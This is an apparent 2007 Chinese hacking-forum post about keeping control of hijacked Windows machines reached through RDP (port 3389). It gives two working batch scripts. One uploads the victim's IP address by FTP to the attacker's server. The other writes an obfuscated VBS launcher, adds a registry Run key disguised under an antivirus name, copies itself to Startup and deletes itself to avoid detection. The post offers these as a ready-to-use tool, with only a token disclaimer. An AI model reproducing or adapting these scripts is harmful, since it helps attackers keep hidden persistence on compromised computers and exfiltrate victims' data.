|
|
楼主 |
发表于 2007-12-16 17:36:05
|
显示全部楼层
|阅读模式
来自 内蒙古兴安盟
文章作者:mastlong
信息来源:(黑狼基地)牛站长论坛(www.nb5.cn)
--------------------------------------------------------------------------------------------
许多朋友扫到3389的肉鸡。。一些发现了 直接给3389的肉机种上灰鸽子之类的后门马
但是这样容易暴露 或则一些人不会使用
每次找到的3389肉机 等肉机重新启动计算机 对方的IP就变了.很麻烦。。。
昨天没事。我想一个方法 利用系统自带的FTP命令 通过本机 自动给你的FTP空间发送3389肉机的IP
也许 高手认为没什么好高的技术含量...但唯一好的 就是不会被杀毒软件查杀 我利用vbs调用BAT隐藏
我今天早上测试了下可以
我申请的FTP是xinwen365.com 免费空间 现在好象申请不起来了 你去baidu搜索免费的FTP
@echo off
echo wscript.sleep 1500>>c:\\windows\\ri.vbs &call c:\\windows\\ri.vbs &del c:\\windows\\ri.vbs >nul 2>nul
:321
ping -n 5 www.baidu.com>nul && goto love
:cn
goto 321
:love
for /f \"tokens=15\" %%i in ('ipconfig ^| find /i \"ip address\"') do set ip=%%i
echo %ip% >c:\\windows\\bsmain_runtime.txt
echo open 自己的FTP空间地址比如你的FTP为:wxzsky.xinwen365.com 不需要输入FTP>c:\\windows\\sky.txt
echo FTP的用户>>c:\\windows\\sky.txt
echo FTP密码>>c:\\windows\\sky.txt
echo put c:\\windows\\bsmain_runtime.txt>>c:\\windows\\sky.txt
echo bye>>c:\\windows\\sky.txt
ftp -s:c:\\windows\\sky.txt
del c:\\windows\\sky.txt
为了不暴露自己的FTP用户和密码请大家把上面的FTP加密
把上面的保存在3389肉机的c:\\windows\\love.bat 名字为love.bat
上面的love.bat 不需要运行
@echo off
echo ^s^e^t ^w^s^h^s^h^e^l^l^=^c^r^e^a^t^e^o^b^j^e^c^t^ ^(^\"^w^s^c^r^i^p^t^.^s^h^e^l^l^\"^ ) >c:\\windows\\windows.vbs
echo ^a^=^w^s^h^s^h^e^l^l^.^r^u^n^ ^(^\"^c^m^d^.^e^x^e^ ^/^c^ ^c^a^l^l^ ^c^:^\\^w^i^n^d^o^w^s^\\^l^o^v^e^.^b^a^t^\"^,^0^)>>c:\\windows\\windows.vbs
reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v avp .exe /d c:\\windows\\windows.vbs
copy c:\\windows\\windows.vbs \"%userprofile%\\「开始」菜单\\程序\\启动\\*.*\"
del %0
这段随便取一个名字 例如为1.bat 运行 每次开机启动利用vbs脚本调用上面的love.bat 然后通过FTP 上传本机IP 到你的FTP 如果对方计算机有防火墙 第一次也许要问你是否运行FTP.exe 选择是
运行了1.bat这个 他会自动删除本身 我加了del %0删除本身的意思
上面是简单的写 希望对各位朋友 有用处
转载请说明:出处(黑狼基地)牛站长论坛.请不要拿来做为非法用途. |
|
发表于 2007-12-16 18:45:41
